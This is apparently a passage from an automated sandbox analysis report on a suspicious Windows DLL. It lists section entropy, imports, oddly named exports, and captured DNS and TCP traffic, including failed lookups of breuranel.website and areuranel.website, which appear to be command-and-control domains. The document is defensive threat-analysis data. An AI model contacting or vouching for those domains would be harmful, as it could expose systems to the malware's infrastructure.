                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x79f710x7a000False0.510071801358data6.75462598911IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60177209336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                                                                      USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                                                                      MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                                                      Exports

                                                                                                                                                                      NameOrdinalAddress
                                                                                                                                                                      BeGrass10x10016020
                                                                                                                                                                      Fieldeight20x100162f0
                                                                                                                                                                      Often30x10016510
                                                                                                                                                                      Townenter40x100167a0

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 11, 2021 22:36:11.910393953 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:11.910442114 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:11.910551071 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:11.917790890 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:11.917829990 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.230382919 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.230546951 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.232964039 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.232984066 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.233254910 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.286731005 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.602170944 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.643145084 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.721329927 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.721457958 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.721606016 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.724698067 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.724731922 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.724807024 CEST49749443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:12.724817991 CEST4434974913.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.102114916 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.102155924 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.102277040 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.107418060 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.107444048 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.417006969 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.417323112 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.420845032 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.420875072 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.421394110 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.474937916 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.736295938 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.779138088 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.850306988 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.850389957 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.850682974 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.851439953 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.851459980 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.851707935 CEST49751443192.168.2.713.82.28.61
                                                                                                                                                                      Oct 11, 2021 22:36:15.851723909 CEST4434975113.82.28.61192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:53.921871901 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:53.921917915 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:53.922110081 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:53.923199892 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:53.923233986 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.435806990 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.436101913 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.443348885 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.443380117 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.443772078 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.453095913 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.499135971 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.628427982 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.628509998 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.628662109 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.628916025 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.628933907 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.628943920 CEST49771443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:54.628948927 CEST4434977140.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.667889118 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.667924881 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.668015003 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.668761015 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.668777943 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.761538029 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.761698961 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.764465094 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.764482975 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.764735937 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.766802073 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795010090 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.795075893 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.795239925 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795471907 CEST49772443192.168.2.740.101.124.210
                                                                                                                                                                      Oct 11, 2021 22:36:54.795490026 CEST4434977240.101.124.210192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.823173046 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.823204041 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.823483944 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.825366974 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.825376987 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.921787977 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.921941042 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.927278996 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.927294970 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.927764893 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.930484056 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.965636969 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.965734005 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.966160059 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.966181040 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.966197968 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.967273951 CEST49773443192.168.2.752.97.223.66
                                                                                                                                                                      Oct 11, 2021 22:36:54.967287064 CEST4434977352.97.223.66192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:57.605314016 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.605459929 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:57.606916904 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.606964111 CEST49774443192.168.2.740.97.161.50
                                                                                                                                                                      Oct 11, 2021 22:36:57.606973886 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:58.118561983 CEST4434977440.97.161.50192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:58.118807077 CEST49774443192.168.2.740.97.161.50

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 11, 2021 22:36:11.873414993 CEST5856253192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:11.889411926 CEST53585628.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:12.732743025 CEST5659053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:15.069077015 CEST6050153192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:15.090919018 CEST53605018.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:15.857944012 CEST5377553192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:33.598215103 CEST5464053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:33.618416071 CEST53546408.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:36.658934116 CEST6033853192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:36.675554037 CEST53603388.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:53.875499010 CEST6456953192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST53645698.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.639195919 CEST5281653192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST53528168.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:54.803148031 CEST5078153192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST53507818.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:57.584440947 CEST5423053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST53542308.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:58.877208948 CEST5491153192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:58.895251036 CEST53549118.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:36:59.030481100 CEST4995853192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:36:59.048182011 CEST53499588.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:37:15.299911022 CEST5973053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:15.320671082 CEST53597308.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:37:19.291902065 CEST5931053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:19.310636997 CEST53593108.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:37:35.954813957 CEST5191953192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:35.972763062 CEST53519198.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:37:36.455446959 CEST6429653192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:39.377583027 CEST5668053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:39.395886898 CEST53566808.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:37:39.848298073 CEST5882053192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:57.013140917 CEST4924753192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:37:57.033107042 CEST53492478.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:00.121130943 CEST5228653192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:00.137804031 CEST53522868.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:17.201041937 CEST5606453192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:17.218822002 CEST53560648.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:17.919895887 CEST6374453192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:17.938257933 CEST53637448.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:18.082855940 CEST6145753192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:18.100589991 CEST53614578.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:20.178450108 CEST5836753192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:20.196131945 CEST53583678.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:20.890144110 CEST6059953192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:20.911417961 CEST53605998.8.8.8192.168.2.7
                                                                                                                                                                      Oct 11, 2021 22:38:21.050587893 CEST5957153192.168.2.78.8.8.8
                                                                                                                                                                      Oct 11, 2021 22:38:21.069540977 CEST53595718.8.8.8192.168.2.7

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Oct 11, 2021 22:36:11.873414993 CEST192.168.2.78.8.8.80x6aabStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:12.732743025 CEST192.168.2.78.8.8.80xc3cfStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:15.069077015 CEST192.168.2.78.8.8.80xbea1Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:15.857944012 CEST192.168.2.78.8.8.80xd53Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:33.598215103 CEST192.168.2.78.8.8.80xb926Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:36.658934116 CEST192.168.2.78.8.8.80xb6fcStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.875499010 CEST192.168.2.78.8.8.80x52b6Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.639195919 CEST192.168.2.78.8.8.80x281aStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.803148031 CEST192.168.2.78.8.8.80xe20fStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.584440947 CEST192.168.2.78.8.8.80xf028Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:58.877208948 CEST192.168.2.78.8.8.80xe9ceStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:59.030481100 CEST192.168.2.78.8.8.80x3b2eStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:15.299911022 CEST192.168.2.78.8.8.80x9968Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:19.291902065 CEST192.168.2.78.8.8.80x5d7eStandard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:35.954813957 CEST192.168.2.78.8.8.80xe451Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:36.455446959 CEST192.168.2.78.8.8.80xe936Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:39.377583027 CEST192.168.2.78.8.8.80x173dStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:39.848298073 CEST192.168.2.78.8.8.80xec9dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:37:57.013140917 CEST192.168.2.78.8.8.80x1d30Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:00.121130943 CEST192.168.2.78.8.8.80x454fStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.201041937 CEST192.168.2.78.8.8.80xe5e8Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:17.919895887 CEST192.168.2.78.8.8.80x568aStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:18.082855940 CEST192.168.2.78.8.8.80xaee3Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.178450108 CEST192.168.2.78.8.8.80xf49Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:20.890144110 CEST192.168.2.78.8.8.80x1000Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:38:21.050587893 CEST192.168.2.78.8.8.80x8706Standard query (0)outlook.office365.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Oct 11, 2021 22:36:11.889411926 CEST8.8.8.8192.168.2.70x6aabNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:12.750817060 CEST8.8.8.8192.168.2.70xc3cfNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:15.090919018 CEST8.8.8.8192.168.2.70xbea1No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:15.873788118 CEST8.8.8.8192.168.2.70xd53No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:33.618416071 CEST8.8.8.8192.168.2.70xb926Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:36.675554037 CEST8.8.8.8192.168.2.70xb6fcName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:53.893239975 CEST8.8.8.8192.168.2.70x52b6No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)FRA-efz.ms-acdc.office.com40.101.124.210A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)FRA-efz.ms-acdc.office.com52.97.170.66A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.657711029 CEST8.8.8.8192.168.2.70x281aNo error (0)FRA-efz.ms-acdc.office.com52.97.147.178A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)HHN-efz.ms-acdc.office.com52.97.223.66A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)HHN-efz.ms-acdc.office.com40.101.124.210A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)HHN-efz.ms-acdc.office.com40.101.124.226A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:54.821300030 CEST8.8.8.8192.168.2.70xe20fNo error (0)HHN-efz.ms-acdc.office.com52.98.208.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                                                      Oct 11, 2021 22:36:57.602292061 CEST8.8.8.8192.168.2.70xf028No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
